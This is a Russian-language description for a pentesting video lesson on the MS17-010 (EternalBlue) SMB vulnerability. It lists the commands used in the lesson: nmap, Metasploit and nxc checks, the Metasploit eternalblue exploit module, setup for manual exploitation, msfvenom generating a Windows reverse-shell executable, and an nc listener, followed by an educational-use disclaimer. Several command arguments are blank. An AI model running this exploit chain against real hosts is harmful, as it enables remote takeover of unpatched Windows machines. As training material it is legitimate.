MS17-010 (ETERNAL BLUE) ЧАСТЬ 1

С этого видео ролика мы начнем изучение атак на сетевую инфраструктуру. Для начала мы с Вами рассмотрим простые уязвимости со средней глубиной погружения, чтобы в дальнейшем вы сами смогли многие моменты разбирать без труда. ----------------------------------------------------------------------------------------------------------------------- Приходите в гости: ----------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------- КОМАНДНЫ КОТОРЫЕ Я ИСПОЛЬЗОВАЛ НА УРОКЕ: ----------------------------------------------------------------------------------------------------------------------- Верификация уязвимости nmap: nmap -p445 --script smb-vuln-ms17-010 Верификация уязвимости msfconsole: use auxiliary/scanner/smb/smb_ms17_010 cat /usr/share/metasploit-framework/data/wordlists/ set CHECK_PIPE true set RHOSTS exploit Верификация уязвимости nxc: nxc smb -M ms17-010 ----------------------------------------------------------------------------------------------------------------------- Автоматизированная эксплуатация: use exploit/windows/smb/ms17_010_eternalblue set rhost run ----------------------------------------------------------------------------------------------------------------------- Загрузка зависимостей для ручной эксплуатации: curl -o sudo python2.7 sudo python2.7 -m pip install distribute sudo python2.7 -m pip install impacket== git clone cd MS17-010/ python2.7 Генерирование импланта (reverse shell): msfvenom -p windows/x64/shell_reverse_tcp lhost= lport=4444 -f exe -o Создать скрин: screen -S shell screen -S exploit Запуск прослушивателя: nc -nvlp 4444 Выйти из контекста скрина: Ctrl A D Зайти в ранее созданный скрин по имени: screen -x shell Зайти в ранее созданный скрин по ID: screen -r 5453434 ----------------------------------------------------------------------------------------------------------------------- Дисклеймер Это обучающее видео создано исключительно в образовательных целях. Ответственность: Автор видео не несет ответственности за любые последствия, вызванные неправильным использованием информации, представленной в этом видео. Видео предназначено для повышения уровня знаний в области информационной безопасности и не поощряет и не поддерживает любую незаконную деятельность. Образовательные цели: Видео создано для обучения специалистов по информационной безопасности, студентов и всех, кто интересуется вопросами защиты данных и систем. Цель видео — помочь зрителям понять принципы работы различных методов защиты и атак для улучшения общей безопасности их систем. Используйте информацию ответственно и в рамках закона!